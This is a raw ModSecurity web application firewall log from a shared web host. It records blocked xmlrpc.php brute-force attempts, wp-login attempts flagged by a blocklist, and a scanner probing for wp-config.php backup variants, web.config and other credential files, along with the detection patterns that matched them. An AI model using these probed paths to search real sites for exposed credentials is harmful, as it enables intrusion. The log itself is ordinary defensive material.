[Tue May 26 19:31:25.274707 2026] [security2:error] [pid 58470:tid 58617] [client 91.245.236.124:44725] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWntbnjVHRH3AGGvmb9agAAABE"]
[Tue May 26 19:31:25.433956 2026] [security2:error] [pid 58470:tid 58495] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grcorp.in"] [uri "/settings.php"] [unique_id "ahWntbnjVHRH3AGGvmb9bgAAaBg"]
[Tue May 26 19:31:25.773396 2026] [security2:error] [pid 58470:tid 58501] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grcorp.in"] [uri "/wp-config.php"] [unique_id "ahWntbnjVHRH3AGGvmb9eAAATB4"]
[Tue May 26 19:31:26.049531 2026] [security2:error] [pid 58470:tid 58622] [client 91.245.236.124:63413] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWntrnjVHRH3AGGvmb9fQAAABY"]
[Tue May 26 19:31:26.049670 2026] [security2:error] [pid 58470:tid 58622] [client 91.245.236.124:63413] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWntrnjVHRH3AGGvmb9fQAAABY"]
[Tue May 26 19:31:26.075457 2026] [security2:error] [pid 58470:tid 58504] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 5.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "grcorp.in"] [uri "/config.php.bak"] [unique_id "ahWntrnjVHRH3AGGvmb9gAAAMiE"]
[Tue May 26 19:31:26.390466 2026] [security2:error] [pid 58470:tid 58503] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "grcorp.in"] [uri "/wp-config.php.backup"] [unique_id "ahWntrnjVHRH3AGGvmb9jAAAbiA"]
[Tue May 26 19:31:26.768501 2026] [security2:error] [pid 58470:tid 58506] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "grcorp.in"] [uri "/wp-config.php.bak"] [unique_id "ahWntrnjVHRH3AGGvmb9mAAAayM"]
[Tue May 26 19:31:26.827846 2026] [security2:error] [pid 58470:tid 58684] [client 91.245.236.124:45243] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWntrnjVHRH3AGGvmb9mQAAAFQ"]
[Tue May 26 19:31:26.827969 2026] [security2:error] [pid 58470:tid 58684] [client 91.245.236.124:45243] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWntrnjVHRH3AGGvmb9mQAAAFQ"]
[Tue May 26 19:31:27.156921 2026] [security2:error] [pid 58470:tid 58509] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "grcorp.in"] [uri "/wp-config.php.old"] [unique_id "ahWnt7njVHRH3AGGvmb9pgAAGyY"]
[Tue May 26 19:31:27.250017 2026] [security2:error] [pid 58470:tid 58649] [client 57.141.2.39:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWntrnjVHRH3AGGvmb9oQAAADE"]
[Tue May 26 19:31:27.554511 2026] [security2:error] [pid 58470:tid 58593] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "grcorp.in"] [uri "/wp-config.php.save"] [unique_id "ahWnt7njVHRH3AGGvmb9tQAABXo"]
[Tue May 26 19:31:27.588143 2026] [security2:error] [pid 58470:tid 58663] [client 91.245.236.124:34353] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnt7njVHRH3AGGvmb9tgAAAD8"]
[Tue May 26 19:31:27.588261 2026] [security2:error] [pid 58470:tid 58663] [client 91.245.236.124:34353] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnt7njVHRH3AGGvmb9tgAAAD8"]
[Tue May 26 19:31:27.979221 2026] [security2:error] [pid 58470:tid 58640] [client 114.119.158.0:21959] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "www.anujtradingco.com"] [uri "/pages/services-modern/"] [unique_id "ahWnt7njVHRH3AGGvmb9vgAAACg"], referer: https://www.evaluateitbysqm.com/blogs/item/27-preparing-for-a-big-move.html?tmpl=component&print=1&start=3210
[Tue May 26 19:31:28.014747 2026] [security2:error] [pid 58470:tid 58507] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "grcorp.in"] [uri "/wp-config.php.swp"] [unique_id "ahWnuLnjVHRH3AGGvmb9vwAAEyQ"]
[Tue May 26 19:31:28.252559 2026] [security2:error] [pid 58470:tid 58519] [remote 213.171.208.62:36370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWnuLnjVHRH3AGGvmb9wwAAdzA"]
[Tue May 26 19:31:28.350981 2026] [security2:error] [pid 58470:tid 58722] [client 91.245.236.124:21627] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnuLnjVHRH3AGGvmb9zwAAAHo"]
[Tue May 26 19:31:28.351098 2026] [security2:error] [pid 58470:tid 58722] [client 91.245.236.124:21627] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnuLnjVHRH3AGGvmb9zwAAAHo"]
[Tue May 26 19:31:28.563019 2026] [security2:error] [pid 58470:tid 58595] [remote 213.171.208.62:36370] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 62.208.171.213.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "filosha.com"] [uri "/wp-login.php"] [unique_id "ahWnuLnjVHRH3AGGvmb91QAASnw"], referer: https://filosha.com/wp-login.php
[Tue May 26 19:31:29.116103 2026] [security2:error] [pid 58470:tid 58725] [client 91.245.236.124:41275] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnubnjVHRH3AGGvmb96QAAAH0"]
[Tue May 26 19:31:29.116220 2026] [security2:error] [pid 58470:tid 58725] [client 91.245.236.124:41275] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnubnjVHRH3AGGvmb96QAAAH0"]
[Tue May 26 19:31:29.663426 2026] [security2:error] [pid 58470:tid 58527] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "grcorp.in"] [uri "/wp-config.php.txt"] [unique_id "ahWnubnjVHRH3AGGvmb9-AAAPjg"]
[Tue May 26 19:31:29.769359 2026] [security2:error] [pid 58470:tid 58677] [client 57.141.2.38:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnubnjVHRH3AGGvmb97QAAAE0"]
[Tue May 26 19:31:29.880760 2026] [security2:error] [pid 58470:tid 58614] [client 91.245.236.124:40443] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnubnjVHRH3AGGvmb9_AAAAA4"]
[Tue May 26 19:31:29.880892 2026] [security2:error] [pid 58470:tid 58614] [client 91.245.236.124:40443] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnubnjVHRH3AGGvmb9_AAAAA4"]
[Tue May 26 19:31:30.656160 2026] [security2:error] [pid 58470:tid 58611] [client 91.245.236.124:14909] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnurnjVHRH3AGGvmb-GQAAAAs"]
[Tue May 26 19:31:30.656267 2026] [security2:error] [pid 58470:tid 58611] [client 91.245.236.124:14909] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnurnjVHRH3AGGvmb-GQAAAAs"]
[Tue May 26 19:31:31.417881 2026] [security2:error] [pid 58470:tid 58695] [client 91.245.236.124:40405] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnu7njVHRH3AGGvmb-LwAAAF8"]
[Tue May 26 19:31:31.417984 2026] [security2:error] [pid 58470:tid 58695] [client 91.245.236.124:40405] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnu7njVHRH3AGGvmb-LwAAAF8"]
[Tue May 26 19:31:31.542833 2026] [security2:error] [pid 58470:tid 58608] [client 168.119.123.75:49932] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "ucdc.co.in"] [uri "/index.php"] [unique_id "ahWnu7njVHRH3AGGvmb-NgAAAAg"], referer: http://ucdc.co.in/
[Tue May 26 19:31:31.675382 2026] [security2:error] [pid 58470:tid 58607] [client 57.141.2.52:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnu7njVHRH3AGGvmb-LAAAAAc"]
[Tue May 26 19:31:32.046316 2026] [security2:error] [pid 58470:tid 58722] [client 168.144.82.230:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "302"] [hostname "sebiregisteredadvisor.jiyani.in"] [uri "/index.php"] [unique_id "ahWnu7njVHRH3AGGvmb-OQAAAHo"], referer: http://sebiregisteredadvisor.jiyani.in/
[Tue May 26 19:31:32.188998 2026] [security2:error] [pid 58470:tid 58639] [client 91.245.236.124:47177] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnvLnjVHRH3AGGvmb-SQAAACc"]
[Tue May 26 19:31:32.189141 2026] [security2:error] [pid 58470:tid 58639] [client 91.245.236.124:47177] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnvLnjVHRH3AGGvmb-SQAAACc"]
[Tue May 26 19:31:32.900780 2026] [security2:error] [pid 58470:tid 58555] [remote 3.105.125.167:33706] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 167.125.105.3.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWnvLnjVHRH3AGGvmb-WgAAGFQ"]
[Tue May 26 19:31:32.962492 2026] [security2:error] [pid 58470:tid 58656] [client 91.245.236.124:55373] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnvLnjVHRH3AGGvmb-XgAAADg"]
[Tue May 26 19:31:32.962668 2026] [security2:error] [pid 58470:tid 58656] [client 91.245.236.124:55373] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnvLnjVHRH3AGGvmb-XgAAADg"]
[Tue May 26 19:31:33.740345 2026] [security2:error] [pid 58470:tid 58630] [client 91.245.236.124:16693] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnvbnjVHRH3AGGvmb-ewAAAB4"]
[Tue May 26 19:31:33.740464 2026] [security2:error] [pid 58470:tid 58630] [client 91.245.236.124:16693] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnvbnjVHRH3AGGvmb-ewAAAB4"]
[Tue May 26 19:31:34.441082 2026] [security2:error] [pid 58470:tid 58641] [client 57.141.2.16:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnvrnjVHRH3AGGvmb-hgAAACk"]
[Tue May 26 19:31:34.522395 2026] [security2:error] [pid 58470:tid 58675] [client 91.245.236.124:22599] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnvrnjVHRH3AGGvmb-kwAAAEs"]
[Tue May 26 19:31:34.522571 2026] [security2:error] [pid 58470:tid 58675] [client 91.245.236.124:22599] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnvrnjVHRH3AGGvmb-kwAAAEs"]
[Tue May 26 19:31:35.308740 2026] [security2:error] [pid 58470:tid 58605] [client 91.245.236.124:36795] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnv7njVHRH3AGGvmb-rwAAAAU"]
[Tue May 26 19:31:35.308854 2026] [security2:error] [pid 58470:tid 58605] [client 91.245.236.124:36795] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnv7njVHRH3AGGvmb-rwAAAAU"]
[Tue May 26 19:31:35.397162 2026] [security2:error] [pid 58470:tid 58712] [client 57.141.2.59:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnvrnjVHRH3AGGvmb-pQAAAHA"]
[Tue May 26 19:31:35.481040 2026] [security2:error] [pid 58470:tid 58714] [client 153.75.250.148:64952] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.com"] [uri "/wp-content/themes/bootstrap-ultimate/docs/thanks.php"] [unique_id "ahWnv7njVHRH3AGGvmb-tgAAAHI"]
[Tue May 26 19:31:36.087592 2026] [security2:error] [pid 58470:tid 58684] [client 91.245.236.124:10517] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnwLnjVHRH3AGGvmb-xgAAAFQ"]
[Tue May 26 19:31:36.087708 2026] [security2:error] [pid 58470:tid 58684] [client 91.245.236.124:10517] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnwLnjVHRH3AGGvmb-xgAAAFQ"]
[Tue May 26 19:31:36.148266 2026] [security2:error] [pid 58470:tid 58685] [client 153.75.250.148:64960] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 148.250.75.153.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "preetishah.moes-art.com"] [uri "/wp-content/themes/bootstrap-ultimate/docs/thanks.php"] [unique_id "ahWnwLnjVHRH3AGGvmb-zAAAAFU"]
[Tue May 26 19:31:36.660542 2026] [security2:error] [pid 58470:tid 58544] [remote 45.148.10.5:54048] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "web.config"] [severity "CRITICAL"] [hostname "grcorp.in"] [uri "/web.config"] [unique_id "ahWnwLnjVHRH3AGGvmb-1wAAa0k"]
[Tue May 26 19:31:36.862370 2026] [security2:error] [pid 58470:tid 58635] [client 91.245.236.124:25523] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnwLnjVHRH3AGGvmb-2AAAACM"]
[Tue May 26 19:31:36.862497 2026] [security2:error] [pid 58470:tid 58635] [client 91.245.236.124:25523] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnwLnjVHRH3AGGvmb-2AAAACM"]
[Tue May 26 19:31:37.630569 2026] [security2:error] [pid 58470:tid 58650] [client 91.245.236.124:31511] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnwbnjVHRH3AGGvmb-_AAAADI"]
[Tue May 26 19:31:37.630697 2026] [security2:error] [pid 58470:tid 58650] [client 91.245.236.124:31511] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnwbnjVHRH3AGGvmb-_AAAADI"]
[Tue May 26 19:31:38.258681 2026] [security2:error] [pid 58470:tid 58726] [client 57.141.2.41:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnwbnjVHRH3AGGvmb_AQAAAH4"]
[Tue May 26 19:31:38.406480 2026] [security2:error] [pid 58470:tid 58680] [client 91.245.236.124:56159] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnwrnjVHRH3AGGvmb_GAAAAFA"]
[Tue May 26 19:31:38.406609 2026] [security2:error] [pid 58470:tid 58680] [client 91.245.236.124:56159] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnwrnjVHRH3AGGvmb_GAAAAFA"]
[Tue May 26 19:31:38.682237 2026] [security2:error] [pid 58470:tid 58579] [remote 49.12.3.147:44332] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 147.3.12.49.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "avprealty.com"] [uri "/wp-login.php"] [unique_id "ahWnwrnjVHRH3AGGvmb_GwAATmw"]
[Tue May 26 19:31:39.187996 2026] [security2:error] [pid 58470:tid 58601] [client 91.245.236.124:41847] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnw7njVHRH3AGGvmb_NQAAAAE"]
[Tue May 26 19:31:39.188137 2026] [security2:error] [pid 58470:tid 58601] [client 91.245.236.124:41847] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnw7njVHRH3AGGvmb_NQAAAAE"]
[Tue May 26 19:31:39.727048 2026] [security2:error] [pid 58470:tid 58671] [client 57.141.2.40:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWnw7njVHRH3AGGvmb_OQAAAEc"]
[Tue May 26 19:31:39.965935 2026] [security2:error] [pid 58470:tid 58611] [client 91.245.236.124:11193] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnw7njVHRH3AGGvmb_TwAAAAs"]
[Tue May 26 19:31:39.966044 2026] [security2:error] [pid 58470:tid 58611] [client 91.245.236.124:11193] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "406"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnw7njVHRH3AGGvmb_TwAAAAs"]
[Tue May 26 19:31:40.735827 2026] [security2:error] [pid 58470:tid 58669] [client 91.245.236.124:54349] ModSecurity: Access denied with code 406 (phase 2). Operator GT matched 0 at USER:bf_block. [file "/opt/mod_security/hg_rules.conf"] [line "1482"] [id "909121"] [msg "IP address blocked, too many xmlrpc.php failures"] [hostname "virgence.com"] [uri "/xmlrpc.php"] [unique_id "ahWnxLnjVHRH3AGGvmb_WwAAAEU"]
